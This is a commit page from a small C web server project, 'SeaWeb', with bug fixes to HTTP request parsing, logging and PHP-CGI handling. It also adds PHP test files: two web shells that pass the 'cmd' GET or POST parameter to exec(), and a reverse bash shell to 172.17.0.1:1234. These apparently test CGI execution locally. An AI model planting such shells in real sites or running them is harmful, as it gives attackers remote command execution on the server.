Spencer/SeaWeb
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bug fixes

Browse Source
This commit is contained in:
Pin
2022-03-08 22:50:24 -05:00
parent 52f01b6c69
commit 3b8405361c
8 changed files with 53 additions and 11 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
Makefile
View File

@@ -43,7 +43,7 @@ dockerTestDeploy: dockerBuild
docker run -p8080:8080 --rm -d seaweb:latest docker run -p8080:8080 --rm -d seaweb:latest
dockerReleaseDeploy: dockerBuild dockerReleaseDeploy: dockerBuild
docker run -p8080:8080 --rm -d seaweb:latest --cert /src/certs/cert.pem --privkey /src/certs/key.pem docker run -p8080:8080 --rm -d seaweb:latest --cert /src/certs/cert.pem --privkey /src/certs/key.pem --verbose
killTestDocker: killTestDocker:
docker stop -t 0 `docker ps | grep "seaweb:latest" | tail -n 1 | tr -s " " | cut -d " " -f 1` docker stop -t 0 `docker ps | grep "seaweb:latest" | tail -n 1 | tr -s " " | cut -d " " -f 1`

15
cmd/server.c
View File

@@ -40,12 +40,16 @@ int parseHTTPRequest(unsigned char *buffer, struct HTTPRequest *r) {
int line = 0; int line = 0;
int contentCheck = 0; int contentCheck = 0;
unsigned char *checkLine = calloc(1000, sizeof(unsigned char)); unsigned char *checkLine = calloc(1000, sizeof(unsigned char));
size_t checkLineLen = 0;
unsigned char *logLine = malloc(sizeof(unsigned char)); unsigned char *logLine = malloc(sizeof(unsigned char));
char * varCheck; char * varCheck;
// Creating empty requestBody // Creating empty requestBody
r->requestBody = calloc(8, sizeof(char)); r->requestBody = malloc(sizeof(char));
r->requestBodyLen = 0; r->requestBodyLen = 0;
r->requestVars = malloc(sizeof(char));
memset(r->requestBody, 0, sizeof(char));
memset(r->requestVars, 0, sizeof(char));
for (int i = 0; i <= strlen((char *)buffer); i++) { for (int i = 0; i <= strlen((char *)buffer); i++) {
temp[0] = buffer[i]; temp[0] = buffer[i];
@@ -84,12 +88,15 @@ int parseHTTPRequest(unsigned char *buffer, struct HTTPRequest *r) {
PrintLog(logLine); PrintLog(logLine);
} else { // Gather information on >first line } else { // Gather information on >first line
if (contentCheck) { // Once content check is set to one everything after is part of the body if (contentCheck) { // Once content check is set to one everything after is part of the body
printf("Check Line: %s\n", checkLine);
r->requestBody = realloc(r->requestBody, r->requestBody = realloc(r->requestBody,
(strlen((char *)checkLine) + strlen((char *)r->requestBody) + 1)); (checkLineLen + r->requestBodyLen + 2));
strcat((char *)r->requestBody, (char *)checkLine); strcat((char *)r->requestBody, (char *)checkLine);
// Adding newline to requestBody // Adding newline to requestBody
strcat((char *)r->requestBody, "\n"); strcat((char *)r->requestBody, "\n");
r->requestBodyLen += strlen((char *)checkLine); r->requestBodyLen += checkLineLen + 2;
printf("Size: %zu\nCheck Size: %zu\n", r->requestBodyLen, checkLineLen);
printf("Req:\n%s\n", r->requestBody);
} else { // Information parsing !content } else { // Information parsing !content
if (strlen((char *)checkLine) == 1) { // Looking for blank empty line to end header info if (strlen((char *)checkLine) == 1) { // Looking for blank empty line to end header info
contentCheck = 1; contentCheck = 1;
@@ -118,10 +125,12 @@ int parseHTTPRequest(unsigned char *buffer, struct HTTPRequest *r) {
if (strlen((char *)checkLine) > 0) { if (strlen((char *)checkLine) > 0) {
// Clear checkLine // Clear checkLine
memset(checkLine,0,strlen((char *)checkLine)); memset(checkLine,0,strlen((char *)checkLine));
checkLineLen = 0;
} }
line++; line++;
} else { } else {
strcat((char *)checkLine, temp); strcat((char *)checkLine, temp);
checkLineLen++;
} }
} }

2
src/requestHandlers.c
View File

@@ -145,7 +145,7 @@ int handlePOSTRequest(int socket, struct HTTPRequest *r, SSL *ssl) {
} }
if (r->requestConType != NULL) { if (r->requestConType != NULL) {
if (!strcmp(r->requestConType, "application/x-www-form-utlencoded") == 0) { if (!(strcmp(r->requestConType, "application/x-www-form-utlencoded") == 0)) {
printDebug("Application From Selected"); printDebug("Application From Selected");
} else { } else {
printDebug("Content will likely get parsed wrong"); printDebug("Content will likely get parsed wrong");

15
src/utils.c
View File

@@ -24,7 +24,7 @@ int PrintLog(unsigned char *message) {
if (!strcmp(WEB_ROOT_DIR, "/var/www/html/")) { if (!strcmp(WEB_ROOT_DIR, "/var/www/html/")) {
FILE *fp; FILE *fp;
fp = fopen("/var/log/seaweb/log", "w"); fp = fopen("/var/log/seaweb/log", "a");
fprintf(fp, "[Log] %02d/%02d/%d %02d:%02d:%02d - %s\n", (now->tm_mon + 1), now->tm_mday, fprintf(fp, "[Log] %02d/%02d/%d %02d:%02d:%02d - %s\n", (now->tm_mon + 1), now->tm_mday,
(now->tm_year + 1900), now->tm_hour, now->tm_min, now->tm_sec, message); (now->tm_year + 1900), now->tm_hour, now->tm_min, now->tm_sec, message);
fclose(fp); fclose(fp);
@@ -81,7 +81,11 @@ char *php_cgi(char *sPath, struct HTTPRequest *r) {
putenv(conLenString); putenv(conLenString);
putenv("CONTENT_TYPE=application/x-www-form-urlencoded"); putenv("CONTENT_TYPE=application/x-www-form-urlencoded");
queryString = malloc(r->requestBodyLen + 24); queryString = malloc(r->requestBodyLen + 24);
if (r->requestBodyLen != 0) {
sprintf(queryString, "QUERY_STRING=%s", r->requestBody); sprintf(queryString, "QUERY_STRING=%s", r->requestBody);
} else {
sprintf(queryString, "QUERY_STRING=");
}
putenv(queryString); putenv(queryString);
// Starting fork to pipe stdin into php-cgi // Starting fork to pipe stdin into php-cgi
@@ -99,15 +103,20 @@ char *php_cgi(char *sPath, struct HTTPRequest *r) {
} else if (pid < 0) { // Error forking } else if (pid < 0) { // Error forking
printDebug("Error in stdin php frok"); printDebug("Error in stdin php frok");
} else { // Parent fork } else { // Parent fork
close(phpPipe[1]); close(phpPipe2[1]);
dup2(phpPipe2[0], STDIN_FILENO); dup2(phpPipe2[0], STDIN_FILENO);
execl("/usr/bin/php-cgi", "php-cgi", NULL); execl("/usr/bin/php-cgi", "php-cgi", NULL);
} }
} else { } else {
putenv("REQUEST_METHOD=GET");
if (r->requestVars != NULL) {
queryString = malloc(strlen(r->requestVars) + 24); queryString = malloc(strlen(r->requestVars) + 24);
sprintf(queryString, "QUERY_STRING=%s", r->requestVars); sprintf(queryString, "QUERY_STRING=%s", r->requestVars);
} else {
queryString = malloc(24);
sprintf(queryString, "QUERY_STRING=");
}
putenv(queryString); putenv(queryString);
putenv("REQUEST_METHOD=GET");
execl("/usr/bin/php-cgi", "php-cgi", NULL); execl("/usr/bin/php-cgi", "php-cgi", NULL);
} }
exit(EXIT_SUCCESS); exit(EXIT_SUCCESS);

7
test_requests/cmd.php Normal file
View File

@@ -0,0 +1,7 @@
<?php
$output=null;
$retval=null;
exec('whoami', $output, $retval);
print_r($output);
?>

7
test_requests/cmdGET.php Normal file
View File

@@ -0,0 +1,7 @@
<?php
$output=null;
$retval=null;
exec($_GET['cmd'], $output, $retval);
print_r($output);
?>

7
test_requests/cmdPOST.php Normal file
View File

@@ -0,0 +1,7 @@
<?php
$output=null;
$retval=null;
exec($_POST['cmd'], $output, $retval);
print_r($output);
?>

3
test_requests/rcmd.php Normal file
View File

@@ -0,0 +1,3 @@
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/1234 0>&1'");
?>